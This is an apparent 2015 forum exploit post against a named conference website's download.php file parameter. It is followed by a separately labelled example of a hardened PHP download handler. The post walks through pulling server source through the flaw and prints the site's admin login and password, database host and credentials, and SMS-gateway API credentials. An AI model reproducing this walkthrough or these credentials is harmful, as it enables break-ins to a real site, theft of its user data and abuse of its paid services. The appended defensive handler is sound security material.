
20.08.2015, 17:14
Type: Arbitrary File Download
Target: 14isppgconvention.com
Vulnerable: http://www.14isppgconvention.com/for...load.php?file=
1. http://www.14isppgconvention.com/for...dmin/index.php (GET)
We get:
PHP code:
if($_SERVER['REQUEST_METHOD']=='POST'){
    if($_POST['username']=='14isppg'&&$_POST['password']=='14isppg@admin'){
        $_SESSION['user']=1;
        header('Location:home.php');
        exit;
Login: 14isppg
Password: 14isppg@admin
2. Log in at http://www.14isppgconvention.com/admin/
We get: http://www.14isppgconvention.com/adm...p?export=users
3. http://www.14isppgconvention.com/for...dmin/users.php (GET)
We find:
PHP code:
mysql_connect("peterjacob82.powwebmysql.com","14isppg","14isppgS20") or die(mysql_error());
mysql_select_db("14isppg") or die(mysql_error())
We find:
PHP code:
$FOO_USERNAME="39ispnc"; $FOO_PASSWORD="n0f5qkqjba"; $FOO_SENDERID="ISPPGM"; $FOO_PRIORITY="11";
$urltopost="http://bulksms.smslite.co.in/xmlapi.php";
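
Added example, not part of the original post and not the site's code: a download handler that resolves the `file` parameter against one fixed directory, so a request for a script such as admin/index.php is refused instead of being returned as source. `DOWNLOAD_ROOT`, `resolve_download()`, the allowed extensions and the sample files are assumptions made for illustration.

```php
<?php
// Added example: hardened handler for a download.php?file= style endpoint.
// DOWNLOAD_ROOT and resolve_download() are hypothetical names.
declare(strict_types=1);

const DOWNLOAD_ROOT = '/var/www/files/public'; // assumed: holds only files meant for download

function resolve_download(string $requested, string $root): ?string
{
    // Plain file name only: no slashes, no NUL bytes, allowlisted extension.
    if (!preg_match('/\A[A-Za-z0-9._-]{1,128}\.(pdf|docx?|xlsx?)\z/', $requested)) {
        return null;
    }
    $base = realpath($root);
    $path = realpath($root . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    // After symlink and ".." resolution the target must still sit inside the root.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

if (PHP_SAPI === 'cli') {
    // Constructed sample tree: one public document next to an admin script.
    $tmp = sys_get_temp_dir() . '/dl_demo_' . bin2hex(random_bytes(4));
    mkdir("$tmp/public", 0700, true);
    mkdir("$tmp/admin", 0700, true);
    file_put_contents("$tmp/public/form.pdf", 'constructed sample');
    file_put_contents("$tmp/admin/index.php", 'constructed sample');
    $names = ['form.pdf', '../admin/index.php', 'index.php', 'form.pdf/../../admin/index.php'];
    foreach ($names as $name) {
        $ok = resolve_download($name, "$tmp/public") !== null;
        printf("%-32s %s\n", $name, $ok ? 'served' : 'rejected');
    }
} else {
    $file = $_GET['file'] ?? '';
    $path = resolve_download(is_string($file) ? $file : '', DOWNLOAD_ROOT);
    if ($path === null) {
        http_response_code(404);
        exit;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('X-Content-Type-Options: nosniff');
    readfile($path);
}
```

Run from the command line, only `form.pdf` is served. Keeping credentials out of PHP source (environment or a file outside the web root) limits what a file-read bug of this kind can expose.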